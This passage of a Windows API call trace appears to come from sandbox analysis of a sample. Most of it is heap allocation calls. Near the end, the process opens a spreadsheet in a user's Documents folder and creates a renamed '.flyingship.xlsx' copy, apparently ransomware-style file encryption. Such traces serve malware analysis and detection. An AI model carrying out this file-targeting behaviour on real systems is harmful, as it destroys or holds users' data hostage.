lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0170.566] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0170.567] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0170.567] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0170.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0170.567] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec40 [0170.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0170.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0170.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0170.568] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0170.568] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0170.569] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0170.570] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0170.571] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0170.571] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0170.571] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0170.571] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.571] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0170.571] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0170.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae58 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6b008 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0170.572] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g_g2urcnwkccd17pjnc.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0170.572] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.572] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0170.572] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0170.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0170.572] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0170.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0170.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0170.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0170.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0170.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0170.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0170.573] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0170.573] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0170.573] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0170.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0170.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28a8 [0170.574] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0170.574] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9100 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0170.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0170.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9100 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0170.575] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0170.575] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0170.575] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0170.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0170.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0170.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0170.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0170.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0170.576] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0170.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0170.576] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x9c5180 [0170.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0170.577] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0170.577] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.flyingship.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\g_g2urcnwkccd17pjnc.flyingship.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0170.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0170.578] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 